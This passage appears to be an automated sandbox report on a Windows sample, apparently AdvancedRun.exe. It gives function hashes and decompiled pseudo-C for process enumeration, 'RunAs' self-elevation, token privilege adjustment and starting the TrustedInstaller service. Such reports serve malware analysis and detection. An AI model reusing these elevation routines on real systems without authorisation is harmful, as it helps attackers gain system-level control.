                                                                                                                • Opcode Fuzzy Hash: fb78727a05851a88ea4b7b8ea7d3137774103afe78fcb1ef393a7670f36c1bb4
                                                                                                                • Instruction Fuzzy Hash: C221C2B5900248DFDB10CFA9D984ADEBBF8EB48324F14841AE955A7310D778A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106E130, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106E1BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 34d4794938a7702cc884202b7c0bee9fd9be48ceb8e3ae093643d2e387ceb798
                                                                                                                • Instruction ID: d8f46c7f50f2acc139ebed76ebccfa18dd25046b8b406caeac18d76057cbee58
                                                                                                                • Opcode Fuzzy Hash: 34d4794938a7702cc884202b7c0bee9fd9be48ceb8e3ae093643d2e387ceb798
                                                                                                                • Instruction Fuzzy Hash: 0B2100B5900248DFDB00CFA9D984ADEBBF4FB48320F24801AE914B7310D738AA44CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106BCF8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106C1D1,00000800,00000000,00000000), ref: 0106C3E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: f53064250b125256a5e2ab44ea92b0fd9e7a8d00058126ab4febabffc0898362
                                                                                                                • Instruction ID: 25f749d2d12c96d5c4a4a9ff96012699f7d130f6147758b1316da31ef07d3c06
                                                                                                                • Opcode Fuzzy Hash: f53064250b125256a5e2ab44ea92b0fd9e7a8d00058126ab4febabffc0898362
                                                                                                                • Instruction Fuzzy Hash: FD1114B29003599FDB10CFAAD544ADEFBF8EB48314F10842EE965B7200C774AA45CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106C0F0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0106C156
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 995eb0c02eaeccc4ae13471fa4d4aceaeb6c9ae5fb9cfa2f173c735147ce8cc5
                                                                                                                • Instruction ID: 9fc41d72fd6cb30f5c27cc02f4bc2119b2a569487171ca269d92072cfcceb0ba
                                                                                                                • Opcode Fuzzy Hash: 995eb0c02eaeccc4ae13471fa4d4aceaeb6c9ae5fb9cfa2f173c735147ce8cc5
                                                                                                                • Instruction Fuzzy Hash: CC1113B1C006498FDB10CF9AC544BDEFBF8AB89224F10841AD469B7600D378A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E22840, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,?,?), ref: 04E2289D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378638983-0
                                                                                                                • Opcode ID: 96beb41bd7eaacdec9218a719f8a01d9c2807d1bfeb26a38db7555874dc48b8c
                                                                                                                • Instruction ID: 3d00d8c6aaba907d1ce374bf2bff5eabd7c9c71a6cf1d9ae3b6819014210a459
                                                                                                                • Opcode Fuzzy Hash: 96beb41bd7eaacdec9218a719f8a01d9c2807d1bfeb26a38db7555874dc48b8c
                                                                                                                • Instruction Fuzzy Hash: CA1115B58002088FDB10CF99D585BDFBBF8FB48324F10841AE915A7300C374A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 04E20E70, Relevance: .3, Instructions: 315COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9c693c8ef658d7dbd585bf82e84c86a27fbb61ad469468a8c5d10c0355d3f66f
                                                                                                                • Instruction ID: fd88ba6c4e46d6d8b138b02174b05b2d6cc1b3c1e482492a0696e9b9ec787bea
                                                                                                                • Opcode Fuzzy Hash: 9c693c8ef658d7dbd585bf82e84c86a27fbb61ad469468a8c5d10c0355d3f66f
                                                                                                                • Instruction Fuzzy Hash: 6D12AAF2512746EAE712CF65F5B82893B61F745328B504328D1619BBE0DBBC2D4ACF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E200B8, Relevance: .3, Instructions: 261COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 445630090f303c793fc3bfa4fa4d364c02f4dcb40a8f9bdf3e2d6905e59f1ba5
                                                                                                                • Instruction ID: d62d6cf796cb98422c577f595823901a938d8c4669368bf23d123c7574892993
                                                                                                                • Opcode Fuzzy Hash: 445630090f303c793fc3bfa4fa4d364c02f4dcb40a8f9bdf3e2d6905e59f1ba5
                                                                                                                • Instruction Fuzzy Hash: 1FA17D36E0021ACFCF05DFA5C9845EEBBB6FF84304B15856AE905BB261EB31A945CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E20E60, Relevance: .2, Instructions: 219COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 02018bab23345051413e455a442fd8c01d889e3f3e5e6071a6dedeb17d962509
                                                                                                                • Instruction ID: de69cfa2b30f666164a5ef4c80fa0a2f58b561b901433497c331404f57d65061
                                                                                                                • Opcode Fuzzy Hash: 02018bab23345051413e455a442fd8c01d889e3f3e5e6071a6dedeb17d962509
                                                                                                                • Instruction Fuzzy Hash: 30C11CB2912746AAD712CF65F4B81893B61FB45328F504328D161AB7E0DFBC2C4ACF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0057A5EC, Relevance: .2, Instructions: 160COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, Offset: 00500000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.313015828.0000000000500000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.313219703.0000000000589000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.313244216.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f9ddae1b636ecae6a5d82fe1f2921836f9ed60b833793ada430254d8751e3ab
                                                                                                                • Instruction ID: b6a99feacea8209d6e902e7d57aea90b24907762500d6f367880922fff304976
                                                                                                                • Opcode Fuzzy Hash: 4f9ddae1b636ecae6a5d82fe1f2921836f9ed60b833793ada430254d8751e3ab
                                                                                                                • Instruction Fuzzy Hash: D161BB3044E7C59FD7878B74C4A84517FF0AE1722832D89EEC4848E473E66A9C96DB63
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: AdvancedRun.exe PID: 2644 Parent PID: 5792 AdvancedRun.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                                                0x00409609
                                                                                                                0x0040960f
                                                                                                                0x00409619
                                                                                                                0x00409623
                                                                                                                0x0040962e
                                                                                                                0x00409633
                                                                                                                0x00409640
                                                                                                                0x0040964a
                                                                                                                0x00409782
                                                                                                                0x0040965a
                                                                                                                0x0040965f
                                                                                                                0x00409678
                                                                                                                0x0040967e
                                                                                                                0x00409681
                                                                                                                0x00409685
                                                                                                                0x00409688
                                                                                                                0x004096b2
                                                                                                                0x004096bf
                                                                                                                0x004096c6
                                                                                                                0x004096cb
                                                                                                                0x004096da
                                                                                                                0x004096e6
                                                                                                                0x0040973b
                                                                                                                0x00409747
                                                                                                                0x0040975f
                                                                                                                0x00409764
                                                                                                                0x0040976a
                                                                                                                0x00409770
                                                                                                                0x00409773
                                                                                                                0x0040977d
                                                                                                                0x00000000
                                                                                                                0x0040977d
                                                                                                                0x004096ee
                                                                                                                0x004096f5
                                                                                                                0x004096fc
                                                                                                                0x00409704
                                                                                                                0x0040970c
                                                                                                                0x0040971c
                                                                                                                0x0040971c
                                                                                                                0x00409704
                                                                                                                0x00409721
                                                                                                                0x00409728
                                                                                                                0x00409739
                                                                                                                0x00409739
                                                                                                                0x00000000
                                                                                                                0x00409728
                                                                                                                0x00409693
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096a5
                                                                                                                0x004096a9
                                                                                                                0x004096ac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096ac
                                                                                                                0x004097a6

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                                0x00401c31
                                                                                                                0x00401c33
                                                                                                                0x00401c48
                                                                                                                0x00401c4f
                                                                                                                0x00401c61
                                                                                                                0x00401c68
                                                                                                                0x00401c74
                                                                                                                0x00401c79
                                                                                                                0x00401c7a
                                                                                                                0x00401c7b
                                                                                                                0x00401c84
                                                                                                                0x00401c89
                                                                                                                0x00401c8e
                                                                                                                0x00401c8f
                                                                                                                0x00401c9b
                                                                                                                0x00401ca6
                                                                                                                0x00401caf
                                                                                                                0x00401cb9
                                                                                                                0x00401cc0
                                                                                                                0x00401cc7
                                                                                                                0x00401cce
                                                                                                                0x00401cd5
                                                                                                                0x00401cdd
                                                                                                                0x00401ce0
                                                                                                                0x00401d14
                                                                                                                0x00401ce2
                                                                                                                0x00401ce8
                                                                                                                0x00401cf3
                                                                                                                0x00401cf6
                                                                                                                0x00401cfe
                                                                                                                0x00401d09
                                                                                                                0x00401d09
                                                                                                                0x00401cfe
                                                                                                                0x00401d1b

                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                0x00408fc9
                                                                                                                0x00408fd0
                                                                                                                0x00408fe8
                                                                                                                0x00000000
                                                                                                                0x00408fea
                                                                                                                0x00408ff4
                                                                                                                0x00409001
                                                                                                                0x00409003
                                                                                                                0x0040900c
                                                                                                                0x0040900e
                                                                                                                0x00409010
                                                                                                                0x0040901a
                                                                                                                0x0040901a
                                                                                                                0x00409010
                                                                                                                0x0040901f
                                                                                                                0x00409026
                                                                                                                0x0040902d
                                                                                                                0x00409030
                                                                                                                0x00409035
                                                                                                                0x00409037
                                                                                                                0x00409040
                                                                                                                0x00409042
                                                                                                                0x00409044
                                                                                                                0x00409051
                                                                                                                0x00409051
                                                                                                                0x00409044
                                                                                                                0x00409053
                                                                                                                0x0040905e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                0x00401319
                                                                                                                0x0040131b
                                                                                                                0x00401327
                                                                                                                0x0040132b
                                                                                                                0x0040133a
                                                                                                                0x0040134b
                                                                                                                0x0040134b
                                                                                                                0x0040134e
                                                                                                                0x0040134e
                                                                                                                0x00401353
                                                                                                                0x0040135b

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                0x0040a348
                                                                                                                0x0040a34e
                                                                                                                0x0040a352
                                                                                                                0x0040a35f
                                                                                                                0x0040a363
                                                                                                                0x0040a369
                                                                                                                0x0040a371
                                                                                                                0x0040a374
                                                                                                                0x0040a37c
                                                                                                                0x0040a380
                                                                                                                0x0040a383
                                                                                                                0x0040a386
                                                                                                                0x0040a388
                                                                                                                0x0040a388
                                                                                                                0x0040a38c
                                                                                                                0x0040a38f
                                                                                                                0x0040a39f
                                                                                                                0x0040a3a1
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a9
                                                                                                                0x0040a3aa
                                                                                                                0x0040a3b3
                                                                                                                0x0040a3b3
                                                                                                                0x0040a37c
                                                                                                                0x0040a371
                                                                                                                0x0040a3b8
                                                                                                                0x0040a3be

                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
